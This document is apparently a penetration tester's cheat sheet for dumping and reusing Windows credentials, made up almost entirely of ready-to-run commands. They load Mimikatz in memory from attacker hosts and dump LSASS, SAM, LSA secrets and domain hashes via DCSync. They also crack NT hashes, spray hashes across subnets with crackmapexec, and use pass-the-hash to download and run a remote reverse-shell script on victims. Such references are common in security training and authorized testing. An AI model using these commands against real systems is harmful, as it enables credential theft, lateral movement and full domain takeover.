Password hash dump and reuse
Local logon password dump
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.132:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords" "lsadump::sam" "exit"'mimikatz.exe (need high integrity)
crackmapexec smb/mssql 1.1.1.1 -u Administrator -p 'Pwd' -M mimikatz -o COMMAND='privilege::debug'
-H nthashtoken::elevate
#to elevate the security token from high integrity (administrator) to SYSTEM integrity (no need if mimikatz launch from SYSTEM shell)dump from memory LSASS
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"dump from SAM
lsadump::sam.\mimikatz.exe "lsadump::secrets" "exit".\mimikatz64.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::secrets" "exit"crack
john --wordlist=/usr/share/wordlists/rockyou.txt ntlmhash.txt --format=NT CME dump hashes remotely (with local admin creds/hash)
#lsass
crackmapexec smb 172.16.1.100 -u admin -p 'pwd' -M lsassy --local-auth
(-d if domain user is local admin)
#sam
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam
(-H nthash)Impacket dump all user password from SAM
victim
reg save HKLM\SAM .\SAM
reg save HKLM\SYSTEM .\SYSTEMkali
impacket-secretsdump -system SYSTEM -sam SAM LOCAL
samdump2 SYSTEM SAMwith admin creds can dump from kali remote
impacket-secretsdump kudos.local/user:[email protected]
or user@ip -hashes :nthash
secretsdump.py domain.local/'dcadmin'@10.1.1.1 -hashes :nthash -dc-ip 10.1.1.1
crackmapexec smb 192.168.200.0/24 -u bwallis -d KUDOS.local -p P@ssWord! --sam
(-p -> -H :nthash)alt
powershell.exe -nop -exec bypass -c "IEX(New-Object Net.Webclient).DownloadString('http://172.16.1.30/Invoke-PowerDump.ps1'); Invoke-Powerdump"wmic shadowcopy call create Volume='C:\'
vssadmin.exe list shadows
(check shadow copy volume path eg \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3)
mkdir C:\temp
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM C:\temp\SAM
cd C:\temp && dir
cd C:\ & dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK
icacls C:\Windows\System32\Config\SYSTEM.OLD
icacls C:\Windows\System32\Config\SAM.OLD
cp C:\Windows\System32\Config\SYSTEM.OLD C:\tmp
cp C:\Windows\System32\Config\SAM.OLD C:\tmp
cd C:\tmp && dirDomain password dump
/user:target e.g. built-in domain admin acct Administrator; or /all
.\mimikatz.exe "lsadump::dcsync /user:Administrator (/csv)" "exit"Check where the credentials can be used
(Pwned = admin on the machine)
smb <-> winrm
crackmapexec smb 192.168.200.0/24 -u calcock -H 924572879ba3b163cc44e0abc5af208a --local-auth
crackmapexec smb 192.168.200.0/24 -u bwallis -d KUDOS.local -p P@ssWord!
crackmapexec smb 172.16.1.100 172.16.1.200 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth --continue-on-success
(check against DC, pwned = own with psexec)
crackmapexec smb 172.16.1.5 -u nessex -H 0d53464368d5e2b607cd68ea29a8cc5f
crackmapexec winrm 172.16.1.5 -u nessex -H 0d53464368d5e2b607cd68ea29a8cc5fCME PtH for rev
(-p password) (-x cmd -X ps)
crackmapexec smb 172.16.1.200 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth -X "iex(new-object net.webclient).downloadstring('http://172.16.1.30/rev.ps1')"NTLM PtH with local Administrator / AD user (not applicable to kerberos)
pth-winexe -U
Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e
//10.11.0.22 "powershell.exe -c iex(new-object net.webclient).downloadstring('http://172.16.1.30/rev.ps1')"
pth-winexe - U username%lmhash:nthash //{host} command
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5 domain.local/[email protected]
may only use the :NThash partNTLM -> TGT Overpass the hash - gain tickets as specific users (other logoned local admin)
#TGT only can use on the machine that it was created
after sekurlsa::logonpasswords
sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
klist
(.\mimikatz.exe "sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:shell.exe" "exit"
NTLM -> TGT
#in new shell
net use \\dc01 (or any cmd that requires domain permissions and would subsequently initiate TGS)
klist
TGT -> RCE
.\psexec.exe \\dc01 cmd.exe -accepteula (or -d -c C:\temp\shell.exe if placed in pivoter)
ipconfig && whoami
No SMB Winrm
Last updated